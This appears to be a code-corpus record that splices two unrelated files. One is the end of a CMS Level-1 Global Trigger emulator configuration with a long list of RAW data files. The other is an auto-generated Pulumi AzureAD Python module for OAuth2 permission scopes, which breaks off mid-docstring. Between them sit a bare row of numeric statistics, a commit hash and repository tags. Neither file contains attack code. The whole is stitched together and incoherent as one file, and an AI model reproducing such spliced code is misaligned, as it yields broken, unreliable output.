'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2300AB3-CE1C-DD11-A36B-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2716924-C21C-DD11-B757-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2790FCC-D01C-DD11-97CE-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F29E7046-C61C-DD11-862A-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2CDC2D1-D21C-DD11-91F2-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F40BA1F2-BB1C-DD11-9148-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F45D0661-C81C-DD11-A2A2-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F4C05AC2-B91C-DD11-A0C5-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F684A2FE-BF1C-DD11-8C85-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F6D667DC-BB1C-DD11-8993-001617DBD224.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F877786C-C81C-DD11-9DBE-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F8EA1087-CA1C-DD11-BBC5-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FAB1D0DA-BB1C-DD11-BB67-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FC2172D3-D21C-DD11-B9FB-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FCAB7B9D-CA1C-DD11-942F-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FE771D08-BE1C-DD11-A65E-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8AC4D-C61C-DD11-A404-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8DB1D-C21C-DD11-96E7-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FED38120-C21C-DD11-8253-001617C3B5D8.root']
# configuration
#
process.load("Configuration.StandardSequences.FakeConditions_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("L1Trigger.Configuration.L1Config_cff")
# L1 menu
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1x1032.L1Menu_CRUZET200805_gr7_muon_cff")
# RawToDigi all data
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Global Trigger emulator
import L1Trigger.GlobalTrigger.gtDigis_cfi
process.l1GtEmulDigis = L1Trigger.GlobalTrigger.gtDigis_cfi.gtDigis.clone()
# block GCT input and the technical triggers (only FDL and GMT active) 0x0101
process.l1GtParameters.DaqActiveBoards = 0x0105
# block GMT input (0xdd12)
#process.l1GtParameters.DaqActiveBoards = 0x00FF
# block both GCT and GMT (FDL and techTrig active)
#process.l1GtParameters.DaqActiveBoards = 0x0003
# input tag for GMT readout collection:
process.l1GtEmulDigis.GmtInputTag = 'gtDigis'
# input tag for GCT readout collections:
#process.l1GtEmulDigis.GctInputTag = 'gctDigis'
# logical flag to produce the L1 GT DAQ readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtDaqRecord = False
# logical flag to produce the L1 GT EVM readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtEvmRecord = False
# logical flag to produce the L1 GT object map record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtObjectMapRecord = False
# logical flag to write the PSB content in the L1 GT DAQ record
# if true, write the PSB content in the record (default)
#process.l1GtEmulDigis.WritePsbL1GtDaqRecord = False
# logical flag to read the technical trigger records
# if true, it will read via getMany the available records (default)
#process.l1GtEmulDigis.ReadTechnicalTriggerRecords = False
# number of "bunch crossing in the event" (BxInEvent) to be emulated
# symmetric around L1Accept (BxInEvent = 0):
# 1 (BxInEvent = 0); 3 (F 0 1) (standard record); 5 (E F 0 1 2) (debug record)
# even numbers (except 0) "rounded" to the nearest lower odd number
# negative value: emulate TotalBxInEvent as given in EventSetup
#process.l1GtEmulDigis.EmulateBxInEvent = 3
# Global Trigger report
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportData = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportData.L1GtRecordInputTag = 'gtDigis'
#
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportEmul = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportEmul.L1GtRecordInputTag = 'l1GtEmulDigis'
#
# compare the L1 GT data and emulator digis
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtDataEmulAnalyzer_cfi")
process.l1GtDataEmulAnalyzer.L1GtEmulInputTag = 'l1GtEmulDigis'
# path to be run
process.p = cms.Path(process.RawToDigi*process.l1GtEmulDigis*process.l1GtDataEmulAnalyzer*process.l1GtTrigReportData*process.l1GtTrigReportEmul)
# services
# Message Logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.enable = False
process.MessageLogger.cout = cms.untracked.PSet(
enable = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
#limit = cms.untracked.int32(-1)
limit = cms.untracked.int32(1000)
)#,
#threshold = cms.untracked.string('DEBUG'), ## DEBUG
#DEBUG = cms.untracked.PSet( ## DEBUG, all messages
#
# limit = cms.untracked.int32(-1)
#)
)
process.MessageLogger.debugModules = ['l1GtEmulDigis', 'l1GtDataEmulAnalyzer']
# histogram service
process.TFileService = cms.Service("TFileService",
fileName = cms.string('L1GtDataFromRawEmulAnalyzer.root')
)
# summary
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True)
)
# output
process.outputL1GtDataEmul = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('testGt_DataFromRawEmulAnalyzer_output.root'),
outputCommands = cms.untracked.vstring('drop *',
'keep *_l1GtDataDigis_*_*',
'keep *_l1GtEmulDigis_*_*',
'keep *_l1GctDataDigis_*_*')
)
process.outpath = cms.EndPath(process.outputL1GtDataEmul)
| 252.476027 | 502 | 0.788384 | 11,418 | 73,723 | 5.087756 | 0.15896 | 0.149556 | 0.274186 | 0.286649 | 0.69037 | 0.689011 | 0.686153 | 0.683175 | 0.682073 | 0.680455 | 0 | 0.349141 | 0.028621 | 73,723 | 291 | 503 | 253.343643 | 0.462053 | 0.028349 | 0 | 0.010256 | 0 | 3.717949 | 0.921109 | 0.918398 | 0 | 0 | 0.000084 | 0 | 0 | 1 | 0 | false | 0 | 0.020513 | 0 | 0.020513 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
316032aaf23dde3fcd09560a44e809e16685dbb1 | 37,342 | py | Python | sdk/python/pulumi_azuread/application_oauth2_permission_scope.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azuread/application_oauth2_permission_scope.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azuread/application_oauth2_permission_scope.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ApplicationOauth2PermissionScopeArgs', 'ApplicationOauth2PermissionScope']
@pulumi.input_type
class ApplicationOauth2PermissionScopeArgs:
def __init__(__self__, *,
admin_consent_description: pulumi.Input[str],
admin_consent_display_name: pulumi.Input[str],
application_object_id: pulumi.Input[str],
type: pulumi.Input[str],
user_consent_description: pulumi.Input[str],
user_consent_display_name: pulumi.Input[str],
value: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ApplicationOauth2PermissionScope resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
pulumi.set(__self__, "admin_consent_description", admin_consent_description)
pulumi.set(__self__, "admin_consent_display_name", admin_consent_display_name)
pulumi.set(__self__, "application_object_id", application_object_id)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "user_consent_description", user_consent_description)
pulumi.set(__self__, "user_consent_display_name", user_consent_display_name)
pulumi.set(__self__, "value", value)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if is_enabled is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if permission_id is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
if permission_id is not None:
pulumi.set(__self__, "permission_id", permission_id)
if scope_id is not None:
pulumi.set(__self__, "scope_id", scope_id)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> pulumi.Input[str]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@admin_consent_description.setter
def admin_consent_description(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_consent_description", value)
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> pulumi.Input[str]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@admin_consent_display_name.setter
def admin_consent_display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_consent_display_name", value)
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> pulumi.Input[str]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@application_object_id.setter
def application_object_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_object_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> pulumi.Input[str]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@user_consent_description.setter
def user_consent_description(self, value: pulumi.Input[str]):
pulumi.set(self, "user_consent_description", value)
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> pulumi.Input[str]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@user_consent_display_name.setter
def user_consent_display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "user_consent_display_name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "permission_id")
@permission_id.setter
def permission_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_id", value)
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@scope_id.setter
def scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope_id", value)
@pulumi.input_type
class _ApplicationOauth2PermissionScopeState:
def __init__(__self__, *,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApplicationOauth2PermissionScope resources.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
if admin_consent_description is not None:
pulumi.set(__self__, "admin_consent_description", admin_consent_description)
if admin_consent_display_name is not None:
pulumi.set(__self__, "admin_consent_display_name", admin_consent_display_name)
if application_object_id is not None:
pulumi.set(__self__, "application_object_id", application_object_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if is_enabled is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if permission_id is not None:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
if permission_id is not None:
pulumi.set(__self__, "permission_id", permission_id)
if scope_id is not None:
pulumi.set(__self__, "scope_id", scope_id)
if type is not None:
pulumi.set(__self__, "type", type)
if user_consent_description is not None:
pulumi.set(__self__, "user_consent_description", user_consent_description)
if user_consent_display_name is not None:
pulumi.set(__self__, "user_consent_display_name", user_consent_display_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> Optional[pulumi.Input[str]]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@admin_consent_description.setter
def admin_consent_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_consent_description", value)
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@admin_consent_display_name.setter
def admin_consent_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_consent_display_name", value)
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> Optional[pulumi.Input[str]]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@application_object_id.setter
def application_object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_object_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "permission_id")
@permission_id.setter
def permission_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_id", value)
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@scope_id.setter
def scope_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> Optional[pulumi.Input[str]]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@user_consent_description.setter
def user_consent_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_consent_description", value)
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@user_consent_display_name.setter
def user_consent_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_consent_display_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class ApplicationOauth2PermissionScope(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an OAuth 2.0 Permission Scope associated with an application.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication")
example_application_oauth2_permission_scope = azuread.ApplicationOauth2PermissionScope("exampleApplicationOauth2PermissionScope",
application_object_id=example_application.id,
admin_consent_description="Administer the application",
admin_consent_display_name="Administer",
enabled=True,
type="User",
user_consent_description="Administer the application",
user_consent_display_name="Administer",
value="administer")
```
## Import
OAuth2 Permission Scopes can be imported using the `object_id` of an Application and the `id` of the Permission Scope, e.g.
```sh
$ pulumi import azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope test 00000000-0000-0000-0000-000000000000/scope/11111111-1111-1111-1111-111111111111
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationOauth2PermissionScopeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an OAuth 2.0 Permission Scope associated with an application.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication")
example_application_oauth2_permission_scope = azuread.ApplicationOauth2PermissionScope("exampleApplicationOauth2PermissionScope",
application_object_id=example_application.id,
admin_consent_description="Administer the application",
admin_consent_display_name="Administer",
enabled=True,
type="User",
user_consent_description="Administer the application",
user_consent_display_name="Administer",
value="administer")
```
## Import
OAuth2 Permission Scopes can be imported using the `object_id` of an Application and the `id` of the Permission Scope, e.g.
```sh
$ pulumi import azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope test 00000000-0000-0000-0000-000000000000/scope/11111111-1111-1111-1111-111111111111
```
:param str resource_name: The name of the resource.
:param ApplicationOauth2PermissionScopeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationOauth2PermissionScopeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationOauth2PermissionScopeArgs.__new__(ApplicationOauth2PermissionScopeArgs)
if admin_consent_description is None and not opts.urn:
raise TypeError("Missing required property 'admin_consent_description'")
__props__.__dict__["admin_consent_description"] = admin_consent_description
if admin_consent_display_name is None and not opts.urn:
raise TypeError("Missing required property 'admin_consent_display_name'")
__props__.__dict__["admin_consent_display_name"] = admin_consent_display_name
if application_object_id is None and not opts.urn:
raise TypeError("Missing required property 'application_object_id'")
__props__.__dict__["application_object_id"] = application_object_id
__props__.__dict__["enabled"] = enabled
if is_enabled is not None and not opts.urn:
warnings.warn("""[NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""is_enabled is deprecated: [NOTE] This attribute has been renamed to `enabled` and will be removed in version 2.0 of the AzureAD provider""")
__props__.__dict__["is_enabled"] = is_enabled
if permission_id is not None and not opts.urn:
warnings.warn("""[NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""", DeprecationWarning)
pulumi.log.warn("""permission_id is deprecated: [NOTE] This attribute has been renamed to `scope_id` and will be removed in version 2.0 of the AzureAD provider""")
__props__.__dict__["permission_id"] = permission_id
__props__.__dict__["scope_id"] = scope_id
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
if user_consent_description is None and not opts.urn:
raise TypeError("Missing required property 'user_consent_description'")
__props__.__dict__["user_consent_description"] = user_consent_description
if user_consent_display_name is None and not opts.urn:
raise TypeError("Missing required property 'user_consent_display_name'")
__props__.__dict__["user_consent_display_name"] = user_consent_display_name
if value is None and not opts.urn:
raise TypeError("Missing required property 'value'")
__props__.__dict__["value"] = value
super(ApplicationOauth2PermissionScope, __self__).__init__(
'azuread:index/applicationOauth2PermissionScope:ApplicationOauth2PermissionScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_consent_description: Optional[pulumi.Input[str]] = None,
admin_consent_display_name: Optional[pulumi.Input[str]] = None,
application_object_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
permission_id: Optional[pulumi.Input[str]] = None,
scope_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_consent_description: Optional[pulumi.Input[str]] = None,
user_consent_display_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'ApplicationOauth2PermissionScope':
"""
Get an existing ApplicationOauth2PermissionScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_consent_description: Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] admin_consent_display_name: Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
:param pulumi.Input[str] application_object_id: The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
:param pulumi.Input[bool] enabled: Determines if the permission scope is enabled. Defaults to `true`.
:param pulumi.Input[str] scope_id: Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
